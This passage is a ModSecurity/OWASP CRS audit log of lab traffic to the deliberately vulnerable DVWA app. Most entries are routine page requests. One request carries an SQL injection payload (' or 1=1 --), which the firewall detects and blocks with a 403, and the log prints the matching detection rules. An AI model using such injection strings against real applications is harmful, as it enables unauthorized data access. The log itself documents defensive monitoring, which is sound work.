(Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:46 --0400","transaction_id":"WRdUWn8AAQEAABwQSC8AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=93","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRdUWn8AAQEAABwQSC8AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":602,"p2":2092,"p3":113,"p4":643,"p5":83,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:48 --0400","transaction_id":"WRdUXH8AAQEAABwQSDAAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=92","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXH8AAQEAABwQSDAAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":385,"p2":1895,"p3":96,"p4":507,"p5":80,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:48 --0400","transaction_id":"WRdUXH8AAQEAABwQSDEAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=91","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXH8AAQEAABwQSDEAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":386,"p2":1579,"p3":87,"p4":365,"p5":94,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:50 --0400","transaction_id":"WRdUXn8AAQEAABwQSDIAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=90","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":578,"p2":4794,"p3":0,"p4":0,"p5":211,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIEAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 18:40:54 GMT","If-None-Match":"\"295-54f6c29741bca\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:45:58 GMT","ETag":"\"295-54f6c3b9c674a\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdUaX8AAQEAABwRiIEAAAAE\"]"],"stopwatch":{"p1":548,"p2":1164,"p3":57,"p4":136,"p5":51,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIIAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdUaX8AAQEAABwRiIIAAAAE\"]"],"stopwatch":{"p1":400,"p2":1170,"p3":49,"p4":440,"p5":239,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIMAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdUaX8AAQEAABwRiIMAAAAE\"]"],"stopwatch":{"p1":353,"p2":881,"p3":44,"p4":245,"p5":68,"sr":15,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}